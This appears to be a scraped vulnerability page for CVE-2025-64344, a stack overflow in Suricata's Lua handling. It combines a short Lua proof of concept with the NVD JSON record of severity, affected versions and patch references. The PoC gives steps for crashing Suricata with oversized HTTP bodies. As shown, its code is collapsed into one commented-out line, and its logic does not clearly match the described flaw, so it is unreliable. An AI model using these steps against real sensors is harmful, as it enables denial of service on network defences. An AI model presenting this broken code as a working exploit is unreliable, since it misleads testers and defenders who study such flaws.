CVE-2025-64344

-- CVE-2025-64344 PoC - Suricata Lua Stack Overflow -- This PoC demonstrates the stack overflow vulnerability in Lua scripts -- when handling large buffers in Suricata -- Create a Lua script that will be used in Suricata rules local function exploit_stack_overflow() -- Large buffer that exceeds stack size local large_buffer = string.rep("A", 1024 * 1024 * 10) -- 10MB buffer -- This will trigger stack overflow when processed by Suricata -- The buffer is passed to Lua script without proper size checking return large_buffer end -- Example Suricata rule that triggers the vulnerability -- alert http any any -> any any (msg:"Large buffer test"; -- flow:established,to_server; lua:exploit.lua; sid:1000001;) -- To test: -- 1. Configure Suricata with the vulnerable Lua script -- 2. Send HTTP traffic with large response body (>5MB) -- 3. Monitor for crashes or abnormal behavior -- Note: This is for educational and testing purposes only

{"cve": {"id": "CVE-2025-64344", "sourceIdentifier": "[email protected]", "published": "2025-11-26T23:15:49.080", "lastModified": "2025-12-03T16:06:06.107", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Suricata is a network IDS, IPS and NSM engine developed by the OISF (Open Information Security Foundation) and the Suricata community. Prior to versions 7.0.13 and 8.0.2, working with large buffers in Lua scripts can lead to a stack overflow. Users of Lua rules and output scripts may be affected when working with large buffers. This includes a rule passing a large buffer to a Lua script. This issue has been patched in versions 7.0.13 and 8.0.2. A workaround for this issue involves disabling Lua rules and output scripts, or making sure limits, such as stream.depth.reassembly and HTTP response body limits (response-body-limit), are set to less than half the stack size."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-121"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-787"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:oisf:suricata:*:*:*:*:*:*:*:*", "versionEndExcluding": "7.0.13", "matchCriteriaId": "AA4D86E3-44A3-4B0B-9CF4-9FC88091D3C1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:oisf:suricata:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.0.0", "versionEndExcluding": "8.0.2", "matchCriteriaId": "C93A731C-19AD-4067-B28C-17164C2D981D"}]}]}], "references": [{"url": "https://github.com/OISF/suricata/commit/e13fe6a90dba210a478148c4084f6f5db17c5b5a", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/OISF/suricata/security/advisories/GHSA-93fh-cgmc-w3rx", "source": "[email protected]", "tags": ["Issue Tracking", "Third Party Advisory"]}]}}